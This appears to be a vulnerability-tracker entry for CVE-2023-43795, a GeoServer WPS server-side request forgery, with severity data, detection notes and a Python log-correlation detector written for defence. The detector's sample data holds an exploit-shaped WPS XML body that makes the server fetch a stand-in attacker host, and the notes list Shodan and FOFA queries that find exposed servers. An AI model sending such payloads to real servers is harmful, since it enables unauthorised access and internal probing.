CVE-2023-43795
published 2023-10-25


Priority: P1 (89) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild: yes (VulnCheck KEV)
EPSS: 67.72% (99.2nd percentile)
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests, which gives an unauthenticated client a way to make GeoServer fetch an attacker-chosen URL: a Server Side Request Forgery. This vulnerability has been patched in versions 2.22.5 and 2.23.2.

Affected (4 ranges)

Vendor      Product     Version range          Fixed in
geoserver   geoserver   < 2.22.5               2.22.5
geoserver   geoserver   (not listed)           (not listed)
osgeo       geoserver   < 2.22.5               2.22.5
osgeo       geoserver   >= 2.23.0, < 2.23.2    2.23.2

Detection & IOCs (extracted from sources)

url:    /wms
url:    /geoserver/wms
other:  Content-Type: application/xml (POST to /wms or /geoserver/wms with a WPS XML body containing JTS:area and an interactsh OOB URL)
  • Detect CVE-2023-43795 exploitation by monitoring for POST requests to /wms or /geoserver/wms with Content-Type: application/xml whose body is a WPS Execute document referencing the JTS:area process and an external URL (the SSRF trigger).
  • Look for outbound HTTP requests from the GeoServer host shortly after such a WPS POST: a successful SSRF makes GeoServer fetch the attacker-controlled URL (OOB interaction), so an egress or DNS log entry to that host is the confirmation.
  • Fingerprint exposed GeoServer instances via the Shodan query 'title:"GeoServer"' or the FOFA query 'app="GeoServer"' to identify attack surface.
  • The vulnerability is unauthenticated (PR:N) and network-reachable (AV:N); the exploit POST request carries no authentication headers.
  • GeoServer 2.22.x before 2.22.5 and 2.23.0/2.23.1 are vulnerable (the affected ranges above also list everything older than 2.22.5); flag any GeoServer instance reporting a version below these thresholds.
  • The Nuclei template uses two randomised variables (string, value) embedded in the WPS XML payload and confirms via an OOB (interactsh) callback match, so the template needs an OOB/interactsh listener; passive log-only detection sees the request pattern but not the confirmation step unless it is correlated with egress logs.
  • The template uses stop-at-first-match across the two paths (/wms, /geoserver/wms), so a scan stops after the first path that matches and may never exercise the other; ensure both paths are covered in custom detection rules.
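The notes above describe a detection rule without showing one. The following Python is an added example, not code from this page, from GeoServer, or from the Nuclei template: it inspects constructed reverse-proxy entries for POSTs to the watched paths carrying a WPS Execute body that references a remote URL, checks a reported GeoServer version against the affected ranges listed above, and pairs a flagged request with a subsequent outbound connection from the GeoServer host to the referenced hostname, which is the OOB confirmation step the notes say passive log inspection lacks. It goes slightly beyond the page: it also watches /wps and /geoserver/wps (an assumption that the WPS endpoint itself is worth the same rule), accepts text/xml as well as application/xml, and reports any process with a remote reference, not only JTS:area. The log record layout, host names and URLs are constructed for the example.

```python
"""Detection logic for WPS Execute SSRF attempts (CVE-2023-43795 pattern).

Added example: not the page's, GeoServer's, or the Nuclei template's code.
The log record layout, hostnames and URLs below are constructed for the demo.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional
from urllib.parse import urlparse

# /wms and /geoserver/wms come from the page; the /wps variants are an assumption.
WATCHED_PATHS = {"/wms", "/geoserver/wms", "/wps", "/geoserver/wps"}
WPS_NS = "http://www.opengis.net/wps/1.0.0"
OWS_NS = "http://www.opengis.net/ows/1.1"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"


@dataclass
class Finding:
    process: str        # WPS process identifier, e.g. "JTS:area"
    urls: List[str]     # remote references the server would be made to fetch
    reason: str


def inspect_wps_body(body: str) -> Optional[Finding]:
    """Return a Finding if `body` is a WPS Execute document that points GeoServer at a remote URL."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Malformed XML still deserves a look: coarse fallback on the raw bytes.
        if "JTS:area" in body and re.search(r"https?://", body):
            urls = re.findall(r"https?://[^\s\"'<>]+", body)
            return Finding("JTS:area", urls, "regex fallback on unparseable XML")
        return None
    if root.tag != f"{{{WPS_NS}}}Execute":
        return None
    ident = root.find(f"{{{OWS_NS}}}Identifier")
    process = ident.text.strip() if ident is not None and ident.text else ""
    # Any element carrying an http(s) xlink:href (wps:Reference in practice) is a fetch by the server.
    urls = []
    for elem in root.iter():
        href = elem.attrib.get(XLINK_HREF) or elem.attrib.get("href")
        if href and urlparse(href).scheme in ("http", "https"):
            urls.append(href)
    if not urls:
        return None
    reason = "JTS:area with remote reference" if process == "JTS:area" \
        else f"process {process!r} with remote reference"
    return Finding(process, urls, reason)


def is_wps_ssrf_attempt(req: dict) -> Optional[Finding]:
    """Apply the request-level filter from the detection notes to one proxy log record."""
    if req.get("method") != "POST" or req.get("path") not in WATCHED_PATHS:
        return None
    ctype = req.get("content_type", "").lower()
    if not (ctype.startswith("application/xml") or ctype.startswith("text/xml")):
        return None
    return inspect_wps_body(req.get("body", ""))


def is_vulnerable_version(version: str) -> bool:
    """Affected ranges from the page: < 2.22.5, and >= 2.23.0 < 2.23.2."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    parts = parts + (0,) * (3 - len(parts))
    return parts < (2, 22, 5) or (2, 23, 0) <= parts < (2, 23, 2)


def correlate_callbacks(request_log, egress_log, window=timedelta(seconds=30)):
    """Pair flagged WPS requests with an outbound connection from the GeoServer host
    to a host named in the body: that pairing is the OOB confirmation a log-only rule lacks."""
    confirmed = []
    for req in request_log:
        finding = is_wps_ssrf_attempt(req)
        if finding is None:
            continue
        targets = {urlparse(u).hostname for u in finding.urls}
        for egress in egress_log:
            if (egress["src"] == req["dst"] and egress["dst"] in targets
                    and req["ts"] <= egress["ts"] <= req["ts"] + window):
                confirmed.append((req, egress, finding))
    return confirmed


# Constructed sample data: an exploit-shaped body and a benign inline-geometry body.
ATTACK_BODY = """<wps:Execute version="1.0.0" service="WPS"
    xmlns:wps="http://www.opengis.net/wps/1.0.0"
    xmlns:ows="http://www.opengis.net/ows/1.1"
    xmlns:xlink="http://www.w3.org/1999/xlink">
  <ows:Identifier>JTS:area</ows:Identifier>
  <wps:DataInputs><wps:Input><ows:Identifier>geom</ows:Identifier>
    <wps:Reference mimeType="application/wkt" xlink:href="http://oob.attacker.example/probe" method="GET"/>
  </wps:Input></wps:DataInputs>
</wps:Execute>"""
BENIGN_BODY = """<wps:Execute version="1.0.0" service="WPS"
    xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1">
  <ows:Identifier>JTS:area</ows:Identifier>
  <wps:DataInputs><wps:Input><ows:Identifier>geom</ows:Identifier>
    <wps:Data><wps:ComplexData mimeType="application/wkt">POLYGON((0 0,1 0,1 1,0 1,0 0))</wps:ComplexData></wps:Data>
  </wps:Input></wps:DataInputs>
</wps:Execute>"""
T0 = datetime(2023, 10, 26, 12, 0, 0)
REQUEST_LOG = [  # constructed reverse-proxy records with captured bodies
    {"ts": T0, "src": "203.0.113.7", "dst": "geoserver-1", "method": "POST",
     "path": "/geoserver/wms", "content_type": "application/xml", "body": ATTACK_BODY},
    {"ts": T0 + timedelta(seconds=5), "src": "198.51.100.9", "dst": "geoserver-1", "method": "POST",
     "path": "/wms", "content_type": "application/xml", "body": BENIGN_BODY},
    {"ts": T0 + timedelta(seconds=9), "src": "198.51.100.9", "dst": "geoserver-1", "method": "GET",
     "path": "/geoserver/wms", "content_type": "", "body": ""},
]
EGRESS_LOG = [  # constructed egress-proxy records: source host -> destination hostname
    {"ts": T0 + timedelta(seconds=1), "src": "geoserver-1", "dst": "oob.attacker.example"},
    {"ts": T0 + timedelta(seconds=6), "src": "geoserver-1", "dst": "tiles.internal"},
]


def run_demo():
    hits = correlate_callbacks(REQUEST_LOG, EGRESS_LOG)
    for req, egress, finding in hits:
        print(f"{req['ts']} {req['src']} -> {req['path']}: {finding.reason}; "
              f"callback {egress['src']} -> {egress['dst']} at {egress['ts']}")
    return hits


if __name__ == "__main__":
    run_demo()
```

Only the first record survives all three filters and is confirmed by the egress entry to oob.attacker.example; the benign request carries its geometry inline and never makes the server fetch anything, and the GET is ignored. A real deployment would feed the request side from a WAF or reverse proxy that captures bodies and the egress side from a forward proxy or DNS log, widening the window if the server is slow to process requests.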

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck             8.6     HIGH